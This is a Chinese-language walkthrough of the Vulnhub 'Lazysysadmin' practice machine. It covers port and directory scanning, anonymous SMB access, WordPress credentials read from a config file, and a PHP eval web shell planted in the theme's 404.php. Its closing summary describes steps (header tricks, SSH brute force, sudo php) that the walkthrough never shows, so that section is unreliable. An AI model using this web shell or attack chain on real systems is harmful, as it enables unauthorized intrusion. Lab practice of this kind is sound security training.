Vulnhub靶机实战-Lazysysadmin

声明

好好学习,天天向上

搭建

使用virtualbox打开,网络和我的PRESIDENTIAL一样,是要vmware和virtualbox互连

渗透

存活扫描,发现目标

arp-scan -l

端口扫描

nmap -T4 -A 192.168.239.15 -p 1-65535 -oN nmap.A

Vulnhub靶机实战-Lazysysadmin

有意思,开启端口不少

发现开启80,22,139,445,3306,6667

访问80

http://192.168.239.15

扫描目录

python3 dirsearch.py -u http://192.168.239.15

扫描结果

info.php
phpmyadmin
wordpress
wordpress/wp-admin
robots.txt

当然优点拿robots.txt开刀了

http://192.168.239.15/robots.txt

发现四个目录

/old/
/test/
/TR2/
/Backnode_files/

Vulnhub靶机实战-Lazysysadmin

看了个寂寞,看看445吧,扫描445发现允许匿名访问

enum4linux 192.168.239.15

Vulnhub靶机实战-Lazysysadmin

windows下,把共享添加到k盘

net use k: \\192.168.239.15\share$

Vulnhub靶机实战-Lazysysadmin

查看一下wordpress的配置文件,看到数据库账号密码 Admin/TogieMYSQL12345^^

Vulnhub靶机实战-Lazysysadmin

登入wordpress/wp-admin

http://192.168.239.15/wordpress/wp-admin
Admin
TogieMYSQL12345^^

老样子,编辑器主题编辑Editor写入一句话

404

<?php @eval($_REQUEST[1]); ?>

Vulnhub靶机实战-Lazysysadmin

访问

http://192.168.239.15/wordpress/wp-content/themes/twentyfifteen/404.php?1=phpinfo();

Vulnhub靶机实战-Lazysysadmin

菜刀连接

Vulnhub靶机实战-Lazysysadmin

查看文件deets.txt,发现密码123456提示

Vulnhub靶机实战-Lazysysadmin

查看home目录发现账户togie

Vulnhub靶机实战-Lazysysadmin

ssh登录togie

ssh togie@193.168.239.15
123456

难受,我这里ssh连接失败,不知道大佬是怎么连上的,我这里只能获取www的权限

总结

1.信息收集

端口发现80和22

通过80,使用x-forwarded-for头,就可以看到web后台

扫描80的目录,看到一些空白的php文件,虽然前端是空白,后面如果可以查看php内容,这些就是重点查看对象

2.web权限

进入后台,添加用户后可以通过user_id越权查看所有的用户信息,这样就能组成社工字典

3.shell权限

利用前面的社工字典,对22进行爆破,爆破除了ssh账号

4.权限维持

使用ssh进行连接登录,发现flag

5.提权

查找80端口扫描出的配置文件,发现数据库root和密码,直接登录

查看sudo,发现php命令可以临时具备root,通过sudo php进行权限提升拿到flag

上一篇:vulnhub渗透实战-Matrix1


下一篇:Vulnhub靶机实战-Warzone 1